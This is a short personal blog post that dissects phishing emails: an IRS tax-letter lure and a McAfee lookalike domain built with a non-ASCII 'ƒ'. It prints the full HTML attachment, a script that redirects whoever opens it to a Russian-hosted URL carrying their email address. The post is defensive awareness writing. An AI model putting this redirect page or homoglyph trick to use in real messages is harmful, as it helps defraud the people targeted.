Phish and chips

Phish and chips

6 months ago

A couple of weeks ago, I came across a fascinating blog post about spotting phishing attempts via email: An Annotated Field Guide to Identifying Phish. For me, it’s one of those topics I come back to every now and then, especially when I receive dodgy looking emails with “simple” HTML links that purport to be legit.

I read this particular post just after getting five (yes, five!) variants of the following email:

(USPS Tax Letter is out for delivery from IRS On January 31, 2023, 2:35:55 AM)
Tax Revenue Letter from IRS.GOV
Message received on January 31, 2023, 2:35:49 AM
Message Transcript "Hello I am calling in regards to your Irs Letter delivery....."

And the included HTML file link (called IRS-TAX-LETTER.HTM to reinforce its legitimacy)? Here you go:

<!DOCTYPE html>
<html lang="en">
<head>
  <title>Redirecting ....</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
</head>
<body>

<div class="container">
<script>
window.location.replace("https://xhnktldlk363c5d9139e8fa.rihann.ru/[email protected]");
</script>
</div>

</body>
</html>

Yep, indeed. If I’d opened that HTML file to see what it showed, I’d have been transported to some GUID-altered URL in Russia. No thanks.

The very next day I got another scam email; this time with the interesting bit being the use of a URL with a non-ASCII character. Ready?

Hmm, McAfee.com, right?

I’m pretty sure that, like me, you’d spotted the “curly” lower-case ƒ – it’s even used in the word “feedback”. Well, it’s also used in the “more info” URL to differentiate it from the real mcafee.com domain. Tsk tsk.

  Loading links to posts on similar topics...